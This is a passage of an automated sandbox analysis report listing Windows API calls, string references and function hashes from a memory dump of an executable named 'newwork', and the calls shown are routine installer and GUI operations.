                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                                        • API String ID: 47109696-2631785700
                                                                                        • Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                        • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                        • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                        • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                        • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                        Strings
                                                                                        • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                        • CSDVersion, xrefs: 00483BFC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                        • API String ID: 3677997916-1910633163
                                                                                        • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                        • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                        • API String ID: 1646373207-4063490227
                                                                                        • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                        • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                        • API String ID: 1646373207-260599015
                                                                                        • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                        • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                        • API String ID: 1646373207-597752486
                                                                                        • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                        • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                        • API String ID: 1646373207-834958232
                                                                                        • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                        • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                        APIs
                                                                                          • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                        • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                        • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2238633743-2683653824
                                                                                        • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                        • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                        • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                        • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                        APIs
                                                                                          • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                          • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                        • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountErrorFileLastMoveTick
                                                                                        • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                        • API String ID: 2406187244-2685451598
                                                                                        • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                        • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00413D46
                                                                                        • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                          • Part of subcall function 00418EC0: 6F59C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                          • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                        • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorDesktopWindow$Show
                                                                                        • String ID:
                                                                                        • API String ID: 2074268717-0
                                                                                        • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                        • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                        • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                        • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString$FileMessageModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 704749118-0
                                                                                        • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                        • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                          • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                          • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                        • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                        • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                        • String ID:
                                                                                        • API String ID: 855768636-0
                                                                                        • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                        • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 177026234-0
                                                                                        • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                        • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 00417260
                                                                                        • SetCursor.USER32(00000000), ref: 004172A3
                                                                                        • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                        • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1959210111-0
                                                                                        • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                        • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                        • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                        • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                        • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
